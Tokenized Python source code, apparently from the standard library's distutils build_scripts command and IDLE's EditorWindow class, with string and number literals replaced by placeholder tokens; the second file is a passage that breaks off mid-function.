<s> """<STR_LIT>""" <EOL> __revision__ = "<STR_LIT>" <EOL> import sys , os , re <EOL> from stat import ST_MODE <EOL> from distutils import sysconfig <EOL> from distutils . core import Command <EOL> from distutils . dep_util import newer <EOL> from distutils . util import convert_path <EOL> from distutils import log <EOL> first_line_re = re . compile ( '<STR_LIT>' ) <EOL> class build_scripts ( Command ) : <EOL> description = "<STR_LIT>" <EOL> user_options = [ <EOL> ( '<STR_LIT>' , '<STR_LIT:d>' , "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:f>' , "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:e>' , "<STR_LIT>" ) , <EOL> ] <EOL> boolean_options = [ '<STR_LIT>' ] <EOL> def initialize_options ( self ) : <EOL> self . build_dir = None <EOL> self . scripts = None <EOL> self . force = None <EOL> self . executable = None <EOL> self . outfiles = None <EOL> def finalize_options ( self ) : <EOL> self . set_undefined_options ( '<STR_LIT>' , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . scripts = self . distribution . scripts <EOL> def get_source_files ( self ) : <EOL> return self . scripts <EOL> def run ( self ) : <EOL> if not self . scripts : <EOL> return <EOL> self . copy_scripts ( ) <EOL> def copy_scripts ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mkpath ( self . build_dir ) <EOL> outfiles = [ ] <EOL> for script in self . scripts : <EOL> adjust = <NUM_LIT:0> <EOL> script = convert_path ( script ) <EOL> outfile = os . path . join ( self . build_dir , os . path . basename ( script ) ) <EOL> outfiles . append ( outfile ) <EOL> if not self . force and not newer ( script , outfile ) : <EOL> log . debug ( "<STR_LIT>" , script ) <EOL> continue <EOL> try : <EOL> f = open ( script , "<STR_LIT:r>" ) <EOL> except IOError : <EOL> if not self . dry_run : <EOL> raise <EOL> f = None <EOL> else : <EOL> first_line = f . readline ( ) <EOL> if not first_line : <EOL> self . 
warn ( "<STR_LIT>" % script ) <EOL> continue <EOL> match = first_line_re . match ( first_line ) <EOL> if match : <EOL> adjust = <NUM_LIT:1> <EOL> post_interp = match . group ( <NUM_LIT:1> ) or '<STR_LIT>' <EOL> if adjust : <EOL> log . info ( "<STR_LIT>" , script , <EOL> self . build_dir ) <EOL> if not self . dry_run : <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> if not sysconfig . python_build : <EOL> outf . write ( "<STR_LIT>" % <EOL> ( self . executable , <EOL> post_interp ) ) <EOL> else : <EOL> outf . write ( "<STR_LIT>" % <EOL> ( os . path . join ( <EOL> sysconfig . get_config_var ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" + sysconfig . get_config_var ( "<STR_LIT>" ) ) , <EOL> post_interp ) ) <EOL> outf . writelines ( f . readlines ( ) ) <EOL> outf . close ( ) <EOL> if f : <EOL> f . close ( ) <EOL> else : <EOL> if f : <EOL> f . close ( ) <EOL> self . copy_file ( script , outfile ) <EOL> if os . name == '<STR_LIT>' : <EOL> for file in outfiles : <EOL> if self . dry_run : <EOL> log . info ( "<STR_LIT>" , file ) <EOL> else : <EOL> oldmode = os . stat ( file ) [ ST_MODE ] & <NUM_LIT:0> <NUM_LIT> <EOL> newmode = ( oldmode | <NUM_LIT:0> <NUM_LIT> ) & <NUM_LIT:0> <NUM_LIT> <EOL> if newmode != oldmode : <EOL> log . info ( "<STR_LIT>" , <EOL> file , oldmode , newmode ) <EOL> os . chmod ( file , newmode ) </s>
<s> import sys <EOL> import os <EOL> import re <EOL> import imp <EOL> from itertools import count <EOL> from Tkinter import * <EOL> import tkSimpleDialog <EOL> import tkMessageBox <EOL> from MultiCall import MultiCallCreator <EOL> import webbrowser <EOL> import idlever <EOL> import WindowList <EOL> import SearchDialog <EOL> import GrepDialog <EOL> import ReplaceDialog <EOL> import PyParse <EOL> from configHandler import idleConf <EOL> import aboutDialog , textView , configDialog <EOL> import macosxSupport <EOL> TK_TABWIDTH_DEFAULT = <NUM_LIT:8> <EOL> def _find_module ( fullname , path = None ) : <EOL> """<STR_LIT>""" <EOL> file = None <EOL> for tgt in fullname . split ( '<STR_LIT:.>' ) : <EOL> if file is not None : <EOL> file . close ( ) <EOL> ( file , filename , descr ) = imp . find_module ( tgt , path ) <EOL> if descr [ <NUM_LIT:2> ] == imp . PY_SOURCE : <EOL> break <EOL> module = imp . load_module ( tgt , file , filename , descr ) <EOL> try : <EOL> path = module . __path__ <EOL> except AttributeError : <EOL> raise ImportError , '<STR_LIT>' + module . __name__ <EOL> return file , filename , descr <EOL> class EditorWindow ( object ) : <EOL> from Percolator import Percolator <EOL> from ColorDelegator import ColorDelegator <EOL> from UndoDelegator import UndoDelegator <EOL> from IOBinding import IOBinding , filesystemencoding , encoding <EOL> import Bindings <EOL> from Tkinter import Toplevel <EOL> from MultiStatusBar import MultiStatusBar <EOL> help_url = None <EOL> def __init__ ( self , flist = None , filename = None , key = None , root = None ) : <EOL> if EditorWindow . help_url is None : <EOL> dochome = os . path . join ( sys . prefix , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if sys . platform . count ( '<STR_LIT>' ) : <EOL> pyver = '<STR_LIT>' + '<STR_LIT>' % sys . version_info [ : <NUM_LIT:3> ] <EOL> if os . path . isdir ( '<STR_LIT>' ) : <EOL> dochome = '<STR_LIT>' <EOL> else : <EOL> basepath = '<STR_LIT>' <EOL> dochome = os . path . 
join ( basepath , pyver , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> elif sys . platform [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> chmfile = os . path . join ( sys . prefix , '<STR_LIT>' , <EOL> '<STR_LIT>' % sys . version_info [ : <NUM_LIT:2> ] ) <EOL> if os . path . isfile ( chmfile ) : <EOL> dochome = chmfile <EOL> elif macosxSupport . runningAsOSXApp ( ) : <EOL> dochome = os . path . join ( sys . prefix , <EOL> '<STR_LIT>' ) <EOL> dochome = os . path . normpath ( dochome ) <EOL> if os . path . isfile ( dochome ) : <EOL> EditorWindow . help_url = dochome <EOL> if sys . platform == '<STR_LIT>' : <EOL> EditorWindow . help_url = '<STR_LIT>' + EditorWindow . help_url <EOL> else : <EOL> EditorWindow . help_url = "<STR_LIT>" <EOL> currentTheme = idleConf . CurrentTheme ( ) <EOL> self . flist = flist <EOL> root = root or flist . root <EOL> self . root = root <EOL> try : <EOL> sys . ps1 <EOL> except AttributeError : <EOL> sys . ps1 = '<STR_LIT>' <EOL> self . menubar = Menu ( root ) <EOL> self . top = top = WindowList . ListedToplevel ( root , menu = self . menubar ) <EOL> if flist : <EOL> self . tkinter_vars = flist . vars <EOL> self . top . instance_dict = flist . inversedict <EOL> else : <EOL> self . tkinter_vars = { } <EOL> self . top . instance_dict = { } <EOL> self . recent_files_path = os . path . join ( idleConf . GetUserCfgDir ( ) , <EOL> '<STR_LIT>' ) <EOL> self . vbar = vbar = Scrollbar ( top , name = '<STR_LIT>' ) <EOL> self . text_frame = text_frame = Frame ( top ) <EOL> self . width = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:width>' ) <EOL> self . text = text = MultiCallCreator ( Text ) ( <EOL> text_frame , name = '<STR_LIT:text>' , padx = <NUM_LIT:5> , wrap = '<STR_LIT:none>' , <EOL> foreground = idleConf . GetHighlight ( currentTheme , <EOL> '<STR_LIT>' , fgBg = '<STR_LIT>' ) , <EOL> background = idleConf . GetHighlight ( currentTheme , <EOL> '<STR_LIT>' , fgBg = '<STR_LIT>' ) , <EOL> highlightcolor = idleConf . 
GetHighlight ( currentTheme , <EOL> '<STR_LIT>' , fgBg = '<STR_LIT>' ) , <EOL> highlightbackground = idleConf . GetHighlight ( currentTheme , <EOL> '<STR_LIT>' , fgBg = '<STR_LIT>' ) , <EOL> insertbackground = idleConf . GetHighlight ( currentTheme , <EOL> '<STR_LIT>' , fgBg = '<STR_LIT>' ) , <EOL> width = self . width , <EOL> height = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . top . focused_widget = self . text <EOL> self . createmenubar ( ) <EOL> self . apply_bindings ( ) <EOL> self . top . protocol ( "<STR_LIT>" , self . close ) <EOL> self . top . bind ( "<STR_LIT>" , self . close_event ) <EOL> if macosxSupport . runningAsOSXApp ( ) : <EOL> text . bind ( '<STR_LIT>' , self . close_event ) <EOL> text . bind ( "<STR_LIT>" , self . cut ) <EOL> text . bind ( "<STR_LIT>" , self . copy ) <EOL> text . bind ( "<STR_LIT>" , self . paste ) <EOL> text . bind ( "<STR_LIT>" , self . center_insert_event ) <EOL> text . bind ( "<STR_LIT>" , self . help_dialog ) <EOL> text . bind ( "<STR_LIT>" , self . python_docs ) <EOL> text . bind ( "<STR_LIT>" , self . about_dialog ) <EOL> text . bind ( "<STR_LIT>" , self . config_dialog ) <EOL> text . bind ( "<STR_LIT>" , self . open_module ) <EOL> text . bind ( "<STR_LIT>" , lambda event : "<STR_LIT>" ) <EOL> text . bind ( "<STR_LIT>" , self . select_all ) <EOL> text . bind ( "<STR_LIT>" , self . remove_selection ) <EOL> text . bind ( "<STR_LIT>" , self . find_event ) <EOL> text . bind ( "<STR_LIT>" , self . find_again_event ) <EOL> text . bind ( "<STR_LIT>" , self . find_in_files_event ) <EOL> text . bind ( "<STR_LIT>" , self . find_selection_event ) <EOL> text . bind ( "<STR_LIT>" , self . replace_event ) <EOL> text . bind ( "<STR_LIT>" , self . goto_line_event ) <EOL> text . bind ( "<STR_LIT>" , self . right_menu_event ) <EOL> text . bind ( "<STR_LIT>" , self . smart_backspace_event ) <EOL> text . bind ( "<STR_LIT>" , self . newline_and_indent_event ) <EOL> text . bind ( "<STR_LIT>" , self . 
smart_indent_event ) <EOL> text . bind ( "<STR_LIT>" , self . indent_region_event ) <EOL> text . bind ( "<STR_LIT>" , self . dedent_region_event ) <EOL> text . bind ( "<STR_LIT>" , self . comment_region_event ) <EOL> text . bind ( "<STR_LIT>" , self . uncomment_region_event ) <EOL> text . bind ( "<STR_LIT>" , self . tabify_region_event ) <EOL> text . bind ( "<STR_LIT>" , self . untabify_region_event ) <EOL> text . bind ( "<STR_LIT>" , self . toggle_tabs_event ) <EOL> text . bind ( "<STR_LIT>" , self . change_indentwidth_event ) <EOL> text . bind ( "<STR_LIT>" , self . move_at_edge_if_selection ( <NUM_LIT:0> ) ) <EOL> text . bind ( "<STR_LIT>" , self . move_at_edge_if_selection ( <NUM_LIT:1> ) ) <EOL> text . bind ( "<STR_LIT>" , self . del_word_left ) <EOL> text . bind ( "<STR_LIT>" , self . del_word_right ) <EOL> if flist : <EOL> flist . inversedict [ self ] = key <EOL> if key : <EOL> flist . dict [ key ] = self <EOL> text . bind ( "<STR_LIT>" , self . new_callback ) <EOL> text . bind ( "<STR_LIT>" , self . flist . close_all_callback ) <EOL> text . bind ( "<STR_LIT>" , self . open_class_browser ) <EOL> text . bind ( "<STR_LIT>" , self . open_path_browser ) <EOL> self . set_status_bar ( ) <EOL> vbar [ '<STR_LIT>' ] = text . yview <EOL> vbar . pack ( side = RIGHT , fill = Y ) <EOL> text [ '<STR_LIT>' ] = vbar . set <EOL> fontWeight = '<STR_LIT>' <EOL> if idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , type = '<STR_LIT:bool>' ) : <EOL> fontWeight = '<STR_LIT>' <EOL> text . config ( font = ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> fontWeight ) ) <EOL> text_frame . pack ( side = LEFT , fill = BOTH , expand = <NUM_LIT:1> ) <EOL> text . pack ( side = TOP , fill = BOTH , expand = <NUM_LIT:1> ) <EOL> text . focus_set ( ) <EOL> usespaces = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , type = '<STR_LIT:bool>' ) <EOL> self . 
usetabs = not usespaces <EOL> self . tabwidth = <NUM_LIT:8> <EOL> self . indentwidth = self . tabwidth <EOL> self . set_notabs_indentwidth ( ) <EOL> self . context_use_ps1 = False <EOL> self . num_context_lines = <NUM_LIT:50> , <NUM_LIT> , <NUM_LIT> <EOL> self . per = per = self . Percolator ( text ) <EOL> if self . ispythonsource ( filename ) : <EOL> self . color = color = self . ColorDelegator ( ) <EOL> per . insertfilter ( color ) <EOL> else : <EOL> self . color = None <EOL> self . undo = undo = self . UndoDelegator ( ) <EOL> per . insertfilter ( undo ) <EOL> text . undo_block_start = undo . undo_block_start <EOL> text . undo_block_stop = undo . undo_block_stop <EOL> undo . set_saved_change_hook ( self . saved_change_hook ) <EOL> self . io = io = self . IOBinding ( self ) <EOL> io . set_filename_change_hook ( self . filename_change_hook ) <EOL> self . recent_files_menu = Menu ( self . menubar ) <EOL> self . menudict [ '<STR_LIT:file>' ] . insert_cascade ( <NUM_LIT:3> , label = '<STR_LIT>' , <EOL> underline = <NUM_LIT:0> , <EOL> menu = self . recent_files_menu ) <EOL> self . update_recent_files_list ( ) <EOL> if filename : <EOL> if os . path . exists ( filename ) and not os . path . isdir ( filename ) : <EOL> io . loadfile ( filename ) <EOL> else : <EOL> io . set_filename ( filename ) <EOL> self . saved_change_hook ( ) <EOL> self . set_indentation_params ( self . ispythonsource ( filename ) ) <EOL> self . load_extensions ( ) <EOL> menu = self . menudict . get ( '<STR_LIT>' ) <EOL> if menu : <EOL> end = menu . index ( "<STR_LIT:end>" ) <EOL> if end is None : <EOL> end = - <NUM_LIT:1> <EOL> if end >= <NUM_LIT:0> : <EOL> menu . add_separator ( ) <EOL> end = end + <NUM_LIT:1> <EOL> self . wmenu_end = end <EOL> WindowList . register_callback ( self . postwindowsmenu ) <EOL> self . askyesno = tkMessageBox . askyesno <EOL> self . askinteger = tkSimpleDialog . askinteger <EOL> self . showerror = tkMessageBox . 
showerror <EOL> def _filename_to_unicode ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( filename , unicode ) or not filename : <EOL> return filename <EOL> else : <EOL> try : <EOL> return filename . decode ( self . filesystemencoding ) <EOL> except UnicodeDecodeError : <EOL> try : <EOL> return filename . decode ( self . encoding ) <EOL> except UnicodeDecodeError : <EOL> return filename . decode ( '<STR_LIT>' ) <EOL> def new_callback ( self , event ) : <EOL> dirname , basename = self . io . defaultfilename ( ) <EOL> self . flist . new ( dirname ) <EOL> return "<STR_LIT>" <EOL> def set_status_bar ( self ) : <EOL> self . status_bar = self . MultiStatusBar ( self . top ) <EOL> if macosxSupport . runningAsOSXApp ( ) : <EOL> self . status_bar . set_label ( '<STR_LIT>' , '<STR_LIT:U+0020>' , side = RIGHT ) <EOL> self . status_bar . set_label ( '<STR_LIT>' , '<STR_LIT>' , side = RIGHT ) <EOL> self . status_bar . set_label ( '<STR_LIT>' , '<STR_LIT>' , side = RIGHT ) <EOL> self . status_bar . pack ( side = BOTTOM , fill = X ) <EOL> self . text . bind ( "<STR_LIT>" , self . set_line_and_column ) <EOL> self . text . event_add ( "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . text . after_idle ( self . set_line_and_column ) <EOL> def set_line_and_column ( self , event = None ) : <EOL> line , column = self . text . index ( INSERT ) . split ( '<STR_LIT:.>' ) <EOL> self . status_bar . set_label ( '<STR_LIT>' , '<STR_LIT>' % column ) <EOL> self . status_bar . set_label ( '<STR_LIT>' , '<STR_LIT>' % line ) <EOL> menu_specs = [ <EOL> ( "<STR_LIT:file>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] <EOL> if macosxSupport . 
runningAsOSXApp ( ) : <EOL> del menu_specs [ - <NUM_LIT:3> ] <EOL> menu_specs [ - <NUM_LIT:2> ] = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def createmenubar ( self ) : <EOL> mbar = self . menubar <EOL> self . menudict = menudict = { } <EOL> for name , label in self . menu_specs : <EOL> underline , label = prepstr ( label ) <EOL> menudict [ name ] = menu = Menu ( mbar , name = name ) <EOL> mbar . add_cascade ( label = label , menu = menu , underline = underline ) <EOL> if sys . platform == '<STR_LIT>' and '<STR_LIT>' in sys . executable : <EOL> menudict [ '<STR_LIT>' ] = menu = Menu ( mbar , name = '<STR_LIT>' ) <EOL> mbar . add_cascade ( label = '<STR_LIT>' , menu = menu ) <EOL> self . fill_menus ( ) <EOL> self . base_helpmenu_length = self . menudict [ '<STR_LIT>' ] . index ( END ) <EOL> self . reset_help_menu_entries ( ) <EOL> def postwindowsmenu ( self ) : <EOL> menu = self . menudict [ '<STR_LIT>' ] <EOL> end = menu . index ( "<STR_LIT:end>" ) <EOL> if end is None : <EOL> end = - <NUM_LIT:1> <EOL> if end > self . wmenu_end : <EOL> menu . delete ( self . wmenu_end + <NUM_LIT:1> , end ) <EOL> WindowList . add_windows_to_menu ( menu ) <EOL> rmenu = None <EOL> def right_menu_event ( self , event ) : <EOL> self . text . tag_remove ( "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT:end>" ) <EOL> self . text . mark_set ( "<STR_LIT>" , "<STR_LIT>" % ( event . x , event . y ) ) <EOL> if not self . rmenu : <EOL> self . make_rmenu ( ) <EOL> rmenu = self . rmenu <EOL> self . event = event <EOL> iswin = sys . platform [ : <NUM_LIT:3> ] == '<STR_LIT>' <EOL> if iswin : <EOL> self . text . config ( cursor = "<STR_LIT>" ) <EOL> rmenu . tk_popup ( event . x_root , event . y_root ) <EOL> if iswin : <EOL> self . text . config ( cursor = "<STR_LIT>" ) <EOL> rmenu_specs = [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] <EOL> def make_rmenu ( self ) : <EOL> rmenu = Menu ( self . text , tearoff = <NUM_LIT:0> ) <EOL> for label , eventname in self . rmenu_specs : <EOL> def command ( text = self . 
text , eventname = eventname ) : <EOL> text . event_generate ( eventname ) <EOL> rmenu . add_command ( label = label , command = command ) <EOL> self . rmenu = rmenu <EOL> def about_dialog ( self , event = None ) : <EOL> aboutDialog . AboutDialog ( self . top , '<STR_LIT>' ) <EOL> def config_dialog ( self , event = None ) : <EOL> configDialog . ConfigDialog ( self . top , '<STR_LIT>' ) <EOL> def help_dialog ( self , event = None ) : <EOL> fn = os . path . join ( os . path . abspath ( os . path . dirname ( __file__ ) ) , '<STR_LIT>' ) <EOL> textView . TextViewer ( self . top , '<STR_LIT>' , fn ) <EOL> def python_docs ( self , event = None ) : <EOL> if sys . platform [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> os . startfile ( self . help_url ) <EOL> else : <EOL> webbrowser . open ( self . help_url ) <EOL> return "<STR_LIT>" <EOL> def cut ( self , event ) : <EOL> self . text . event_generate ( "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> def copy ( self , event ) : <EOL> if not self . text . tag_ranges ( "<STR_LIT>" ) : <EOL> return <EOL> self . text . event_generate ( "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> def paste ( self , event ) : <EOL> self . text . event_generate ( "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> def select_all ( self , event = None ) : <EOL> self . text . tag_add ( "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT>" ) <EOL> self . text . mark_set ( "<STR_LIT>" , "<STR_LIT:1.0>" ) <EOL> self . text . see ( "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> def remove_selection ( self , event = None ) : <EOL> self . text . tag_remove ( "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT:end>" ) <EOL> self . text . see ( "<STR_LIT>" ) <EOL> def move_at_edge_if_selection ( self , edge_index ) : <EOL> """<STR_LIT>""" <EOL> self_text_index = self . text . index <EOL> self_text_mark_set = self . text . mark_set <EOL> edges_table = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def move_at_edge ( event ) : <EOL> if ( event . 
state & <NUM_LIT:5> ) == <NUM_LIT:0> : <EOL> try : <EOL> self_text_index ( "<STR_LIT>" ) <EOL> self_text_mark_set ( "<STR_LIT>" , edges_table [ edge_index ] ) <EOL> except TclError : <EOL> pass <EOL> return move_at_edge <EOL> def del_word_left ( self , event ) : <EOL> self . text . event_generate ( '<STR_LIT>' ) <EOL> return "<STR_LIT>" <EOL> def del_word_right ( self , event ) : <EOL> self . text . event_generate ( '<STR_LIT>' ) <EOL> return "<STR_LIT>" <EOL> def find_event ( self , event ) : <EOL> SearchDialog . find ( self . text ) <EOL> return "<STR_LIT>" <EOL> def find_again_event ( self , event ) : <EOL> SearchDialog . find_again ( self . text ) <EOL> return "<STR_LIT>" <EOL> def find_selection_event ( self , event ) : <EOL> SearchDialog . find_selection ( self . text ) <EOL> return "<STR_LIT>" <EOL> def find_in_files_event ( self , event ) : <EOL> GrepDialog . grep ( self . text , self . io , self . flist ) <EOL> return "<STR_LIT>" <EOL> def replace_event ( self , event ) : <EOL> ReplaceDialog . replace ( self . text ) <EOL> return "<STR_LIT>" <EOL> def goto_line_event ( self , event ) : <EOL> text = self . text <EOL> lineno = tkSimpleDialog . askinteger ( "<STR_LIT>" , <EOL> "<STR_LIT>" , parent = text ) <EOL> if lineno is None : <EOL> return "<STR_LIT>" <EOL> if lineno <= <NUM_LIT:0> : <EOL> text . bell ( ) <EOL> return "<STR_LIT>" <EOL> text . mark_set ( "<STR_LIT>" , "<STR_LIT>" % lineno ) <EOL> text . see ( "<STR_LIT>" ) <EOL> def open_module ( self , event = None ) : <EOL> try : <EOL> name = self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> except TclError : <EOL> name = "<STR_LIT>" <EOL> else : <EOL> name = name . strip ( ) <EOL> name = tkSimpleDialog . askstring ( "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> parent = self . text , initialvalue = name ) <EOL> if name : <EOL> name = name . 
strip ( ) <EOL> if not name : <EOL> return <EOL> try : <EOL> ( f , file , ( suffix , mode , type ) ) = _find_module ( name ) <EOL> except ( NameError , ImportError ) , msg : <EOL> tkMessageBox . showerror ( "<STR_LIT>" , str ( msg ) , parent = self . text ) <EOL> return <EOL> if type != imp . PY_SOURCE : <EOL> tkMessageBox . showerror ( "<STR_LIT>" , <EOL> "<STR_LIT>" % name , parent = self . text ) <EOL> return <EOL> if f : <EOL> f . close ( ) <EOL> if self . flist : <EOL> self . flist . open ( file ) <EOL> else : <EOL> self . io . loadfile ( file ) <EOL> def open_class_browser ( self , event = None ) : <EOL> filename = self . io . filename <EOL> if not filename : <EOL> tkMessageBox . showerror ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> master = self . text ) <EOL> self . text . focus_set ( ) <EOL> return None <EOL> head , tail = os . path . split ( filename ) <EOL> base , ext = os . path . splitext ( tail ) <EOL> import ClassBrowser <EOL> ClassBrowser . ClassBrowser ( self . flist , base , [ head ] ) <EOL> def open_path_browser ( self , event = None ) : <EOL> import PathBrowser <EOL> PathBrowser . PathBrowser ( self . flist ) <EOL> def gotoline ( self , lineno ) : <EOL> if lineno is not None and lineno > <NUM_LIT:0> : <EOL> self . text . mark_set ( "<STR_LIT>" , "<STR_LIT>" % lineno ) <EOL> self . text . tag_remove ( "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT:end>" ) <EOL> self . text . tag_add ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . center ( ) <EOL> def ispythonsource ( self , filename ) : <EOL> if not filename or os . path . isdir ( filename ) : <EOL> return True <EOL> base , ext = os . path . splitext ( os . path . basename ( filename ) ) <EOL> if os . path . normcase ( ext ) in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> return True <EOL> try : <EOL> f = open ( filename ) <EOL> line = f . readline ( ) <EOL> f . close ( ) <EOL> except IOError : <EOL> return False <EOL> return line . startswith ( '<STR_LIT>' ) and line . 
find ( '<STR_LIT>' ) >= <NUM_LIT:0> <EOL> def close_hook ( self ) : <EOL> if self . flist : <EOL> self . flist . close_edit ( self ) <EOL> def set_close_hook ( self , close_hook ) : <EOL> self . close_hook = close_hook <EOL> def filename_change_hook ( self ) : <EOL> if self . flist : <EOL> self . flist . filename_changed_edit ( self ) <EOL> self . saved_change_hook ( ) <EOL> self . top . update_windowlist_registry ( self ) <EOL> if self . ispythonsource ( self . io . filename ) : <EOL> self . addcolorizer ( ) <EOL> else : <EOL> self . rmcolorizer ( ) <EOL> def addcolorizer ( self ) : <EOL> if self . color : <EOL> return <EOL> self . per . removefilter ( self . undo ) <EOL> self . color = self . ColorDelegator ( ) <EOL> self . per . insertfilter ( self . color ) <EOL> self . per . insertfilter ( self . undo ) <EOL> def rmcolorizer ( self ) : <EOL> if not self . color : <EOL> return <EOL> self . color . removecolors ( ) <EOL> self . per . removefilter ( self . undo ) <EOL> self . per . removefilter ( self . color ) <EOL> self . color = None <EOL> self . per . insertfilter ( self . undo ) <EOL> def ResetColorizer ( self ) : <EOL> "<STR_LIT>" <EOL> if self . color : <EOL> self . color = self . ColorDelegator ( ) <EOL> self . per . insertfilter ( self . color ) <EOL> theme = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' ) <EOL> self . text . config ( idleConf . GetHighlight ( theme , "<STR_LIT>" ) ) <EOL> def ResetFont ( self ) : <EOL> "<STR_LIT>" <EOL> fontWeight = '<STR_LIT>' <EOL> if idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , type = '<STR_LIT:bool>' ) : <EOL> fontWeight = '<STR_LIT>' <EOL> self . text . config ( font = ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> fontWeight ) ) <EOL> def RemoveKeybindings ( self ) : <EOL> "<STR_LIT>" <EOL> self . Bindings . default_keydefs = keydefs = idleConf . 
GetCurrentKeySet ( ) <EOL> for event , keylist in keydefs . items ( ) : <EOL> self . text . event_delete ( event , * keylist ) <EOL> for extensionName in self . get_standard_extension_names ( ) : <EOL> xkeydefs = idleConf . GetExtensionBindings ( extensionName ) <EOL> if xkeydefs : <EOL> for event , keylist in xkeydefs . items ( ) : <EOL> self . text . event_delete ( event , * keylist ) <EOL> def ApplyKeybindings ( self ) : <EOL> "<STR_LIT>" <EOL> self . Bindings . default_keydefs = keydefs = idleConf . GetCurrentKeySet ( ) <EOL> self . apply_bindings ( ) <EOL> for extensionName in self . get_standard_extension_names ( ) : <EOL> xkeydefs = idleConf . GetExtensionBindings ( extensionName ) <EOL> if xkeydefs : <EOL> self . apply_bindings ( xkeydefs ) <EOL> menuEventDict = { } <EOL> for menu in self . Bindings . menudefs : <EOL> menuEventDict [ menu [ <NUM_LIT:0> ] ] = { } <EOL> for item in menu [ <NUM_LIT:1> ] : <EOL> if item : <EOL> menuEventDict [ menu [ <NUM_LIT:0> ] ] [ prepstr ( item [ <NUM_LIT:0> ] ) [ <NUM_LIT:1> ] ] = item [ <NUM_LIT:1> ] <EOL> for menubarItem in self . menudict . keys ( ) : <EOL> menu = self . menudict [ menubarItem ] <EOL> end = menu . index ( END ) + <NUM_LIT:1> <EOL> for index in range ( <NUM_LIT:0> , end ) : <EOL> if menu . type ( index ) == '<STR_LIT>' : <EOL> accel = menu . entrycget ( index , '<STR_LIT>' ) <EOL> if accel : <EOL> itemName = menu . entrycget ( index , '<STR_LIT:label>' ) <EOL> event = '<STR_LIT>' <EOL> if menuEventDict . has_key ( menubarItem ) : <EOL> if menuEventDict [ menubarItem ] . has_key ( itemName ) : <EOL> event = menuEventDict [ menubarItem ] [ itemName ] <EOL> if event : <EOL> accel = get_accelerator ( keydefs , event ) <EOL> menu . entryconfig ( index , accelerator = accel ) <EOL> def set_notabs_indentwidth ( self ) : <EOL> "<STR_LIT>" <EOL> if not self . usetabs : <EOL> self . indentwidth = idleConf . 
GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> type = '<STR_LIT:int>' ) <EOL> def reset_help_menu_entries ( self ) : <EOL> "<STR_LIT>" <EOL> help_list = idleConf . GetAllExtraHelpSourcesList ( ) <EOL> helpmenu = self . menudict [ '<STR_LIT>' ] <EOL> helpmenu_length = helpmenu . index ( END ) <EOL> if helpmenu_length > self . base_helpmenu_length : <EOL> helpmenu . delete ( ( self . base_helpmenu_length + <NUM_LIT:1> ) , helpmenu_length ) <EOL> if help_list : <EOL> helpmenu . add_separator ( ) <EOL> for entry in help_list : <EOL> cmd = self . __extra_help_callback ( entry [ <NUM_LIT:1> ] ) <EOL> helpmenu . add_command ( label = entry [ <NUM_LIT:0> ] , command = cmd ) <EOL> self . menudict [ '<STR_LIT>' ] = helpmenu <EOL> def __extra_help_callback ( self , helpfile ) : <EOL> "<STR_LIT>" <EOL> def display_extra_help ( helpfile = helpfile ) : <EOL> if not helpfile . startswith ( ( '<STR_LIT>' , '<STR_LIT:http>' ) ) : <EOL> url = os . path . normpath ( helpfile ) <EOL> if sys . platform [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> os . startfile ( helpfile ) <EOL> else : <EOL> webbrowser . open ( helpfile ) <EOL> return display_extra_help <EOL> def update_recent_files_list ( self , new_file = None ) : <EOL> "<STR_LIT>" <EOL> rf_list = [ ] <EOL> 